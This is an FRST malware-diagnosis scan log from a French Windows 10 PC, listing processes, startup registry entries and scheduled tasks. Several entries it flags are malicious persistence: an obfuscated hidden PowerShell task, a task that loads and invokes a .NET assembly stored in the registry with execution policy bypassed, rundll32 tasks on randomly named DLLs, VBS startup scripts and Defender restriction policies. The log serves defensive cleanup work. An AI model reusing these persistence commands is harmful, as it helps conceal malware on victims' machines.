Résultats d'analyse de Farbar Recovery Scan Tool (FRST) (x64) Version: 25-03-2023
Exécuté par HenriDupouy (administrateur) sur MUGIPAPA-PC (Gigabyte Technology Co., Ltd. AB350-Gaming 3) (31-03-2023 16:27:02)
Exécuté depuis C:\Users\Hdupo\Desktop\jules
Profils chargés: HenriDupouy
Plate-forme: Microsoft Windows 10 Famille Version 21H2 19044.2130 (X64) Langue: Français (France)
Navigateur par défaut: FF
Mode d'amorçage: Normal

==================== Processus (Avec liste blanche) =================

(Si un élément est inclus dans le fichier fixlist.txt, le processus sera arrêté. Le fichier ne sera pas déplacé.)

(Brother Industries, Ltd.) [Fichier non signé] C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe
(Brother Industries, Ltd.) [Fichier non signé] C:\Program Files (x86)\ControlCenter4\BrCtrlCntr.exe
(C:\Program Files (x86)\ControlCenter4\BrCtrlCntr.exe ->) (Brother Industries, Ltd.) [Fichier non signé] C:\Program Files (x86)\ControlCenter4\BrCcUxSys.exe
(C:\Program Files (x86)\GIGABYTE\EasyTuneEngineService\GraphicsCardEngineStarter.exe ->) (GIGA-BYTE TECHNOLOGY CO., LTD. -> GIGA-BYTE TECHNOLOGY CO., LTD.) C:\Program Files (x86)\GIGABYTE\EasyTuneEngineService\GraphicsCardEngine.exe
(C:\Program Files (x86)\GIGABYTE\GService\GCloud.exe ->) (GIGA-BYTE TECHNOLOGY CO., LTD. -> Microsoft) C:\Program Files (x86)\GIGABYTE\CloudStation_Server\HomeCloud\HCLOUD.exe
(C:\Program Files (x86)\GIGABYTE\Smart TimeLock\TimeMgmtDaemon.exe ->) (Gigabyte Technology CO., LTD.) [Fichier non signé] C:\Program Files (x86)\GIGABYTE\Smart TimeLock\AlarmClock.exe
(C:\Program Files\LGHUB\lghub.exe ->) (Logitech Inc -> Logitech, Inc.) C:\Program Files\LGHUB\lghub_agent.exe
(C:\Program Files\Mozilla Firefox\firefox.exe ->) (Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe <50>
(C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe <2>
(Corsair Memory, Inc. -> Corsair Memory, Inc.) C:\Program Files\Corsair\CORSAIR iCUE 4 Software\iCUE.exe
(Discord Inc. -> Discord Inc.) C:\Users\Hdupo\AppData\Local\Discord\app-1.0.9011\Discord.exe <6>
(explorer.exe ->) (Logitech Inc -> Logitech, Inc.) C:\Program Files\LGHUB\lghub.exe <3>
(GIGA-BYTE TECHNOLOGY CO., LTD. -> ) C:\Program Files (x86)\GIGABYTE\AppCenter\ApCent.exe
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(services.exe ->) () [Fichier non signé] C:\Program Files (x86)\GIGABYTE\AppCenter\AdjustService.exe
(services.exe ->) () [Fichier non signé] C:\Program Files\Serviio\bin\ServiioService.exe <2>
(services.exe ->) (Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
(services.exe ->) (Brother Industries, Ltd.) [Fichier non signé] C:\Program Files (x86)\Browny02\BrYNSvc.exe
(services.exe ->) (Corsair Memory, Inc. -> Corsair Memory, Inc.) C:\Program Files\Corsair\CORSAIR iCUE 4 Software\Corsair.Service.exe
(services.exe ->) (Corsair Memory, Inc. -> Corsair Memory, Inc.) C:\Program Files\Corsair\CORSAIR iCUE 4 Software\CorsairMsiPluginService.exe
(services.exe ->) (GIGA-BYTE TECHNOLOGY CO., LTD. -> GIGA-BYTE TECHNOLOGY CO., LTD.) C:\Program Files (x86)\GIGABYTE\EasyTuneEngineService\EasyTuneEngineService.exe
(services.exe ->) (GIGA-BYTE TECHNOLOGY CO., LTD. -> Microsoft) C:\Program Files (x86)\GIGABYTE\GService\GCloud.exe
(services.exe ->) (Gigabyte Technology CO., LTD.) [Fichier non signé] C:\Program Files (x86)\GIGABYTE\Smart TimeLock\TimeMgmtDaemon.exe
(services.exe ->) (Lavasoft Software Canada Inc. -> ) C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.WCAssistant.WinService.exe
(services.exe ->) (Logitech Inc -> Logitech, Inc.) C:\Program Files\LGHUB\lghub_updater.exe
(services.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft GameInput\x64\gameinputsvc.exe <2>
(services.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.GamingServices_10.75.13001.0_x64__8wekyb3d8bbwe\gamingservices.exe
(services.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.GamingServices_10.75.13001.0_x64__8wekyb3d8bbwe\gamingservicesnet.exe
(services.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe <2>
(services.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2302.7-0\MsMpEng.exe
(services.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2302.7-0\NisSrv.exe
(services.exe ->) (Nuance Communications, Inc. -> Nuance Communications, Inc.) C:\Program Files (x86)\Nuance\PaperPort\PDFProFiltSrvPP.exe
(services.exe ->) (Nvidia Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe <2>
(services.exe ->) (Nvidia Corporation -> NVIDIA Corporation) C:\Windows\System32\DriverStore\FileRepository\nvddig.inf_amd64_49c60aac2cd2e569\Display.NvContainer\NVDisplay.Container.exe <2>
(services.exe ->) (Parsec Cloud, Inc. -> Parsec) C:\Program Files\Parsec\pservice.exe
(services.exe ->) (Realtek Semiconductor Corp. -> Realtek Semiconductor) C:\Windows\System32\DriverStore\FileRepository\realtekservice.inf_amd64_f82b8b1a0b601f77\RtkAudUService64.exe <2>
(services.exe ->) (Safer-Networking Ltd. -> Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe
(services.exe ->) (TeamViewer Germany GmbH -> TeamViewer Germany GmbH) C:\Program Files\TeamViewer\TeamViewer_Service.exe
(svchost.exe ->) (CyberLink Corp. -> CyberLink Corp.) C:\Program Files (x86)\CyberLink\Shared files\PDStyleAgent\PDStyleAgent.exe
(svchost.exe ->) (GIGA-BYTE TECHNOLOGY CO., LTD. -> GIGA-BYTE TECHNOLOGY CO., LTD.) C:\Program Files (x86)\GIGABYTE\EasyTuneEngineService\GraphicsCardEngineStarter.exe
(svchost.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.YourPhone_1.23022.140.0_x64__8wekyb3d8bbwe\PhoneExperienceHost.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\wbem\WMIADAP.exe

==================== Registre (Avec liste blanche) ===================

(Si un élément est inclus dans le fichier fixlist.txt, l'élément de Registre sera restauré à la valeur par défaut ou supprimé. Le fichier ne sera pas déplacé.)

HKLM\...\Run: [SecurityHealth] => [X]
HKLM\...\Run: [CORSAIR iCUE 4 Software] => C:\Program Files\Corsair\CORSAIR iCUE 4 Software\iCUE Launcher.exe [321240 2021-07-26] (Corsair Memory, Inc. -> Corsair Memory, Inc.)
HKLM\...\Run: [RtkAudUService] => C:\Windows\System32\DriverStore\FileRepository\realtekservice.inf_amd64_f82b8b1a0b601f77\RtkAudUService64.exe [1343072 2021-08-22] (Realtek Semiconductor Corp. -> Realtek Semiconductor)
HKLM-x32\...\Run: [SDTray] => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe [6787856 2019-03-19] (Safer-Networking Ltd. -> Safer-Networking Ltd.)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [59720 2013-09-13] (Apple Inc. -> Apple Inc.)
HKLM-x32\...\Run: [QuickTime Task] => "G:\Games\QuickTime\QTTask.exe" -atboottime (Pas de fichier)
HKLM-x32\...\Run: [ControlCenter4] => C:\Program Files (x86)\ControlCenter4\BrCcBoot.exe [143360 2012-09-06] (Brother Industries, Ltd.) [Fichier non signé]
HKLM-x32\...\Run: [BrStsMon00] => C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe [3076096 2012-06-06] (Brother Industries, Ltd.) [Fichier non signé]
HKLM-x32\...\Run: [IndexSearch] => "C:\Program Files (x86)\Nuance\PaperPort\IndexSearch.exe" (Pas de fichier)
HKLM-x32\...\Run: [PaperPort PTD] => "C:\Program Files (x86)\Nuance\PaperPort\pptd40nt.exe" (Pas de fichier)
HKLM-x32\...\Run: [PDFHook] => C:\Program Files (x86)\Nuance\PDF Viewer Plus\pdfpro5hook.exe (Pas de fichier)
HKLM-x32\...\Run: [PDF5 Registry Controller] => C:\Program Files (x86)\Nuance\PDF Viewer Plus\RegistryController.exe (Pas de fichier)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [711288 2023-01-09] (Oracle America, Inc. -> Oracle Corporation)
HKLM-x32\...\RunOnce: [PreRun] => C:\Program Files (x86)\Gigabyte\AppCenter\PreRun.exe [14632 2016-02-26] (GIGA-BYTE TECHNOLOGY CO., LTD. -> )
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center: Restriction <==== ATTENTION
HKU\S-1-5-21-274230415-3152524040-1578995417-1001\...\Run: [LGHUB] => C:\Program Files\LGHUB\lghub.exe [136443968 2021-11-03] (Logitech Inc -> Logitech, Inc.)
HKU\S-1-5-21-274230415-3152524040-1578995417-1001\...\Run: [CCleaner Smart Cleaning] => C:\Program Files\CCleaner\CCleaner64.exe [39159608 2023-03-07] (PIRIFORM SOFTWARE LIMITED -> Piriform Software Ltd)
HKU\S-1-5-21-274230415-3152524040-1578995417-1001\...\Run: [PeerBlock] => C:\Program Files\PeerBlock\peerblock.exe [2513992 2014-01-14] (PeerBlock, LLC -> PeerBlock, LLC)
HKU\S-1-5-21-274230415-3152524040-1578995417-1001\...\Run: [Skype for Desktop] => C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe [114000232 2021-10-11] (Skype Software Sarl -> Skype Technologies S.A.)
HKU\S-1-5-21-274230415-3152524040-1578995417-1001\...\Run: [Discord] => C:\Users\Hdupo\AppData\Local\Discord\Update.exe [1525016 2022-10-21] (Discord Inc. -> GitHub)
HKU\S-1-5-21-274230415-3152524040-1578995417-1001\...\Run: [MicrosoftEdgeAutoLaunch_45065A3DCB6803631E1ADEF415A71717] => "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5 [4055952 2023-03-24] (Microsoft Corporation -> Microsoft Corporation)
HKU\S-1-5-21-274230415-3152524040-1578995417-1001\...\Run: [movavi_suite_agent] => "C:\Users\Hdupo\AppData\Roaming\Movavi Video Suite 22\AgentInformer.exe" (Pas de fichier)
HKU\S-1-5-21-274230415-3152524040-1578995417-1001\...\Run: [EpicGamesLauncher] => C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe [32754128 2023-01-08] (Epic Games Inc. -> Epic Games, Inc.)
HKU\S-1-5-21-274230415-3152524040-1578995417-1001\...\Run: [Opera GX Browser Assistant] => C:\Users\Hdupo\AppData\Local\Programs\Opera GX\assistant\browser_assistant.exe (Pas de fichier)
HKU\S-1-5-21-274230415-3152524040-1578995417-1001\...\Run: [Web Companion] => C:\Program Files (x86)\Lavasoft\Web Companion\Application\WebCompanion.exe [9250224 2022-02-24] (Lavasoft Software Canada Inc. -> Lavasoft)
HKU\S-1-5-21-274230415-3152524040-1578995417-1001\...\Run: [Bloom] => C:\Users\Hdupo\AppData\Roaming\Bloom\Bloom.exe --Ii7SIeN (Pas de fichier)
HKU\S-1-5-21-274230415-3152524040-1578995417-1001\...\Run: [Overwolf] => C:\Program Files (x86)\Overwolf\OverwolfLauncher.exe -overwolfsilent (Pas de fichier)
HKU\S-1-5-21-274230415-3152524040-1578995417-1001\...\Run: [App-Torrent-Igruha] => "C:\Users\Hdupo\AppData\Local\Programs\com.wsa.a10\App-Torrent-Igruha.exe" (Pas de fichier)
HKU\S-1-5-21-274230415-3152524040-1578995417-1001\...\Run: [Snap Camera] => "D:\Games\Snap Camera.exe" --minimized-mode (Pas de fichier)
HKU\S-1-5-21-274230415-3152524040-1578995417-1001\...\Run: [ISUSPM] => C:\ProgramData\FLEXnet\Connect\11\ISUSPM.exe -scheduler (Pas de fichier)
HKU\S-1-5-21-274230415-3152524040-1578995417-1001\...\Run: [Parsec.App.0] => C:\Program Files\Parsec\parsecd.exe [462472 2022-12-16] (Parsec Cloud, Inc. -> Parsec)
HKU\S-1-5-21-274230415-3152524040-1578995417-1001\...\MountPoints2: {3aa80cf2-3657-11ec-8e12-1c1b0de23a20} - "G:\WD SmartWare.exe" autoplay=true
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files\Google\Chrome\Application\111.0.5563.147\Installer\chrmstp.exe [2023-03-31] (Google LLC -> Google LLC)
HKLM\Software\...\Authentication\Credential Providers: [{5EF9A232-5B5B-4768-95F2-3F601FB184E3}] -> C:\Windows\system32\AutoGreenCP.dll [2021-08-20] () [Fichier non signé]
Startup: C:\Users\Hdupo\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bfslzk.vbs [2022-02-09] () [Fichier non signé]
InternetURL: C:\Users\Hdupo\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\yWTXuAPAoF.url -> URL: "C:\Users\Hdupo\AppData\Local\Temp\pgdhkpRFHL\DslrG.vbs" <==== ATTENTION
HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION

==================== Tâches planifiées (Avec liste blanche) ============

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)

Task: {05661523-2C95-4244-99EA-172CE3548AEB} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [3342376 2022-12-07] (Nvidia Corporation -> NVIDIA Corporation)
Task: {06F7271A-173B-4CEB-B927-FD913CDBD4A4} - System32\Tasks\DhyhGOYkHLcwyL => rundll32 "C:\Program Files (x86)\bQZEOuyekqRU2\sLmZTDxkXMWOD.dll",#1 <==== ATTENTION
Task: {1493453A-83A3-4165-B171-04E88990E4D6} - System32\Tasks\WcTeBRgOXLrCFSZ2 => rundll32 "C:\Program Files (x86)\wjTkFrExU\LZDkMO.dll",#1 <==== ATTENTION
Task: {17389699-1DDC-4F56-B215-86B3CAC65745} - System32\Tasks\CLToast => C:\Program Files (x86)\CyberLink\Shared files\CLToast.exe [2317480 2021-12-27] (CyberLink Corp. -> )
Task: {1A719EDB-D215-4B20-AD27-2E00829725ED} - System32\Tasks\EasyTune 1 => C:\Program Files (x86)\GIGABYTE\EasyTune\etocfile.exe [20352 2021-10-11] (GIGA-BYTE TECHNOLOGY CO., LTD. -> GIGA-BYTE TECHNOLOGY CO., LTD.)
Task: {1AB5EBDF-C796-4676-ABC1-D89CFBB2DF0B} - System32\Tasks\AMDLinkUpdate => C:\Program Files\AMD\CIM\BIN64\InstallManagerApp.exe [1709320 2021-02-10] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
Task: {2BA83E10-4434-4C6B-84AB-6741CBBB3C44} - System32\Tasks\Outbyte\Driver Updater\Start Driver Updater automatic scanning => C:\Program Files (x86)\Outbyte\Driver Updater\DriverUpdater.exe /UseTray /AutoScan /Schedule (Pas de fichier)
Task: {2CCD1094-F015-4636-AA99-2C22F17E6F9E} - System32\Tasks\Opera scheduled Autoupdate 1654891718 => C:\Users\Hdupo\AppData\Local\Programs\Opera\launcher.exe --scheduledautoupdate $(Arg0) (Pas de fichier)
Task: {3609F867-AA66-4B20-BF87-1601D0748519} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [908328 2022-12-07] (Nvidia Corporation -> NVIDIA Corporation)
Task: {367A4C6B-3557-4088-B645-8C85FFF4D842} - System32\Tasks\Microsoft\Windows\Ras\Ras => powershell -c "$fqn='xp yreaig';$eub='b$pjv=k1z7 ;cFdo rw(e$xit=o7 ;9$biw w-4l4er y$ j0;9$bi3+c+ )6{mSptha r8tc-cSsl6e eqpr -xm8 t520 09;z$vn = (1$ is*d1j4 8 8e9 7d182r59+o383b3r590k0b7 6652)n%01ueb9w;y$1hp=60 ;l$khu=9[4Nrerty.yD n so]v:b:rGleltaH o svt Asd0d7r eqsxsfewsw(w''0'' +5$9n2+w''c.yc5o7m6''n) ; i f (l'élément de données a 2077 caractères en plus).
Task: {3710A78F-F25C-43A7-A8C0-BF2BE0576637} - System32\Tasks\Outbyte\Driver Updater\Time for deal => C:\Program Files (x86)\Outbyte\Driver Updater\DriverUpdater.exe /UseTray /Schedule /TimeForDeal (Pas de fichier)
Task: {38E59DE3-AEDD-4C23-849A-121B978C3B14} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [649256 2022-12-07] (Nvidia Corporation -> NVIDIA Corporation)
Task: {39492F0D-14A9-411E-99A9-A7C901CEF0F0} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Check for updates => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe [7337200 2020-03-04] (Safer-Networking Ltd. -> Safer-Networking Ltd.)
Task: {4051AC41-3859-48A0-9B4B-9ACC67522FFF} - System32\Tasks\GraphicsCardEngine => C:\Program Files (x86)\GIGABYTE\EasyTuneEngineService\GraphicsCardEngineStarter.exe [234880 2021-04-13] (GIGA-BYTE TECHNOLOGY CO., LTD. -> GIGA-BYTE TECHNOLOGY CO., LTD.)
Task: {40B4F531-7ED7-40F2-9CD2-F5C65109AAA4} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1560056 2023-02-01] (Adobe Inc. -> Adobe Inc.)
Task: {43842F3A-95E8-4775-8F95-9650953E0BD3} - System32\Tasks\Outbyte\Driver Updater\Start Driver Updater оn logon => C:\Program Files (x86)\Outbyte\Driver Updater\DriverUpdater.exe /UseTray /CheckAutoscan /Schedule (Pas de fichier)
Task: {4CFDD16F-0B80-40B4-99C7-34F6DAF578F7} - System32\Tasks\AMDAutoUpdate => C:\Program Files\AMD\AutoUpdate\AMDAutoUpdate.exe [672064 2022-09-26] (Advanced Micro Devices Inc. -> )
Task: {509CA88C-9036-40F5-AEF0-C57633BB3461} - System32\Tasks\NvTmRep_CrashReport3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1655336 2022-12-07] (Nvidia Corporation -> NVIDIA Corporation)
Task: {5A18789A-33C7-4D0C-8CB1-EA442CD13323} - System32\Tasks\CCleanerSkipUAC - Hdupo => C:\Program Files\CCleaner\CCleaner.exe [33038648 2023-03-07] (PIRIFORM SOFTWARE LIMITED -> Piriform Software Ltd)
Task: {5C6E706B-9A1A-4DAB-AD8B-C974C376CE1A} - System32\Tasks\NvTmRep_CrashReport2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1655336 2022-12-07] (Nvidia Corporation -> NVIDIA Corporation)
Task: {69D1E24D-3D0C-4523-964C-CF9853F719D4} - System32\Tasks\SIV-VGA => C:\Program Files (x86)\GIGABYTE\SIV\Sensord.exe [257408 2021-06-29] (GIGA-BYTE TECHNOLOGY CO., LTD. -> GIGA-BYTE TECHNOLOGY CO., LTD.)
Task: {6DD53124-712D-4E61-9B05-3559D6DAD0F2} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2302.7-0\MpCmdRun.exe [1645904 2023-03-29] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {71F3A4EF-B06C-4FAC-BA41-3436B97B008A} - System32\Tasks\Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\default-browser-agent.exe [718752 2023-03-22] (Mozilla Corporation -> Mozilla Foundation)
Task: {72EED537-1AF2-4848-A38A-784BF77CB1A9} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2302.7-0\MpCmdRun.exe [1645904 2023-03-29] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {7AED892A-3E13-49DC-9CE7-407BAF81B8E6} - System32\Tasks\PowerDirectorStyleAgent => C:\Program Files (x86)\CyberLink\Shared files\PDStyleAgent\PDStyleAgent.exe [97960 2021-12-27] (CyberLink Corp. -> CyberLink Corp.)
Task: {7B326768-F946-4000-A1A8-E9FCF3A74C4F} - System32\Tasks\Overwolf Updater Task => C:\Program Files (x86)\Common Files\Overwolf\OverwolfUpdater.exe [2577752 2022-08-01] (Overwolf Ltd -> Overwolf LTD)
Task: {7BE59F2E-AF84-42E2-B529-FEF2837164B4} - System32\Tasks\Opera GX scheduled assistant Autoupdate 1643985166 => C:\Users\Hdupo\AppData\Local\Programs\Opera GX\launcher.exe -> --scheduledautoupdate --component-name=assistant --component-path="C:\Users\Hdupo\AppData\Local\Programs\Opera GX\assistant" $(Arg0)
Task: {868E1633-9C8B-48F0-AEF9-E2AFE2308232} - System32\Tasks\CCleanerSkipUAC - HenriDupouy => C:\Program Files\CCleaner\CCleaner.exe [33038648 2023-03-07] (PIRIFORM SOFTWARE LIMITED -> Piriform Software Ltd)
Task: {87CA4D89-4387-4C27-B1B1-4D77BC5426EE} - System32\Tasks\NvTmRep_CrashReport4_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1655336 2022-12-07] (Nvidia Corporation -> NVIDIA Corporation)
Task: {8C00AD36-72A7-4BF3-B042-FF8FE8055412} - System32\Tasks\EasyTune => C:\Program Files (x86)\GIGABYTE\EasyTune\etinit.exe [17280 2021-04-08] (GIGA-BYTE TECHNOLOGY CO., LTD. -> GIGA-BYTE TECHNOLOGY CO., LTD.)
Task: {8C743957-F823-4213-8002-8245439E760F} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe [714256 2023-03-07] (PIRIFORM SOFTWARE LIMITED -> Piriform Software Ltd)
Task: {9582B244-41B9-4BA8-80F4-A37F0498DA37} - System32\Tasks\klcp_update => C:\Program Files (x86)\K-Lite Codec Pack\Tools\CodecTweakTool.exe [1907712 2021-10-20] () [Fichier non signé]
Task: {97ACAD82-5E5C-4D24-A14B-D580D6E82A87} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156232 2021-09-03] (Google LLC -> Google LLC)
Task: {A3ACEB94-5BA7-418D-9C02-EF7D6A73FB9E} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2302.7-0\MpCmdRun.exe [1645904 2023-03-29] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {A5915428-9C74-4F74-B2AB-FE9A6C89FC45} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Refresh immunization => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDImmunize.exe [5723640 2019-09-04] (Safer-Networking Ltd. -> Safer-Networking Ltd.)
Task: {A881B5E2-5664-4B90-A2FF-AFAA2DE595FE} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [1003128 2022-03-18] (Nvidia Corporation -> NVIDIA Corporation) -> -d "C:\Program Files\NVIDIA Corporation\NvDriverUpdateCheck" -l 3 -f C:\ProgramData\NVIDIA\NvContainerDriverUpdateCheck.log
Task: {B1E223FE-213D-4AE7-8630-E39FBA33AA5A} - System32\Tasks\memte => powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoExit -Command [System.Reflection.Assembly]::Load((Get-ItemProperty HKCU:\Software\memte\).memte).EntryPoint.Invoke($Null,$Null) <==== ATTENTION
Task: {B2BCDEA9-5875-4467-9FD5-537B3058C254} - System32\Tasks\Timer => c:\windows\system\svchost.exe (Pas de fichier) <==== ATTENTION
Task: {BA48A7E7-09A7-4309-BED2-50AF79577A80} - System32\Tasks\SIV => C:\Program Files (x86)\GIGABYTE\SIV\Thermald.exe [392296 2023-01-09] (GIGA-BYTE TECHNOLOGY CO., LTD. -> GIGA-BYTE TECHNOLOGY CO., LTD.)
Task: {C26B9E67-A69B-40B3-8FE4-8087006E7DF0} - System32\Tasks\CCleanerCrashReporting => C:\Program Files\CCleaner\CCleanerBugReport.exe [4703544 2023-03-07] (PIRIFORM SOFTWARE LIMITED -> Piriform Software) -> --product 90 --send dumps|report --path "C:\Program Files\CCleaner\LOG" --programpath "C:\Program Files\CCleaner" --configpath "C:\Program Files\CCleaner\Setup" --guid "4ed078b9-994e-4e18-b6db-62c13a8ce9ed" --version "6.10.10347" --silent
Task: {C2784F19-ECEC-42BB-9067-361AFAE3BBF6} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Scan the system => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDScan.exe [6166736 2020-03-04] (Safer-Networking Ltd. -> Safer-Networking Ltd.)
Task: {CD686892-5239-48B9-8A0D-ADF5C1290524} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe -task (Pas de fichier)
Task: {CD9B7AD8-956C-4EE8-9C0F-B1C9114F514D} - System32\Tasks\Diagnostic\Service => C:\Users\Hdupo\AppData\Roaming\cbanql\setevn.exe -> "C:\Users\Hdupo\AppData\Roaming\cbanql\setevn.dat"
Task: {CDE6BF8D-B58D-4B83-9F7D-CFE35DE4335C} - System32\Tasks\CLToastRun => C:\Program Files (x86)\CyberLink\Shared files\CLToast.exe [2317480 2021-12-27] (CyberLink Corp. -> )
Task: {D797481B-E2BD-4927-AE12-AA112CC54243} - System32\Tasks\Opera GX scheduled Autoupdate 1642679077 => C:\Users\Hdupo\AppData\Local\Programs\Opera GX\launcher.exe --scheduledautoupdate $(Arg0) (Pas de fichier)
Task: {DB5BA65C-E32A-4443-9085-980F7E8DB848} - System32\Tasks\Mozilla\Firefox Background Update 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\firefox.exe [676768 2023-03-22] (Mozilla Corporation -> Mozilla Corporation) -> --MOZ_LOG sync,prependheader,timestamp,append,maxsize:1,Dump:5 --MOZ_LOG_FILE C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\backgroundupdate.moz_log --backgroundtask backgroundupdate
Task: {DFF10AF9-9B8E-4DCF-85CD-530F533C527B} - System32\Tasks\xuGNGpMfuIDWg2 => C:\Windows\system32\wscript.exe "C:\ProgramData\ZvEHJNdJDJxIeVVB\KUDyZbS.wsf" <==== ATTENTION
Task: {E0A377B5-20C8-4A64-8E44-68630028D450} - System32\Tasks\Microsoft\Windows\Application Experience\CNBP_SDEngine.ni => C:\Windows\microsoft.net\framework\v4.0.30319\RegSvcs.exe /nologo C:\PROGRA~3\ACCESS~1\STARTH~1\MTXFAW~1.DLL
Task: {E81783FC-EAAD-4CF0-8F37-CB1D2C85DA7C} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156232 2021-09-03] (Google LLC -> Google LLC)
Task: {EB353E66-7F81-4B44-931F-E03436A188F6} - System32\Tasks\fvgavqrnEnHHROaNgGs2 => rundll32 "C:\Program Files (x86)\GuXKuCyCeSmjC\GReXNap.dll",#1 <==== ATTENTION
Task: {ED22AC97-BABB-4C10-8167-380D8FC25FFC} - System32\Tasks\NvTmRep_CrashReport1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1655336 2022-12-07] (Nvidia Corporation -> NVIDIA Corporation)
Task: {EF8504A7-8E68-4529-80BB-5F70E67ABFEB} - System32\Tasks\FPfgiItdWHGuoXXpQ2 => rundll32 "C:\Program Files (x86)\uAhcATovcXckvYCnvyR\HicabjG.dll",#1 <==== ATTENTION
Task: {FF63E958-15C4-47FC-9AFF-4EA9BE3662B0} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [908328 2022-12-07] (Nvidia Corporation -> NVIDIA Corporation)

(Si un élément est inclus dans le fichier fixlist.txt, le fichier tâche (.job) sera déplacé. Le fichier exécuté par la tâche ne sera pas déplacé.)

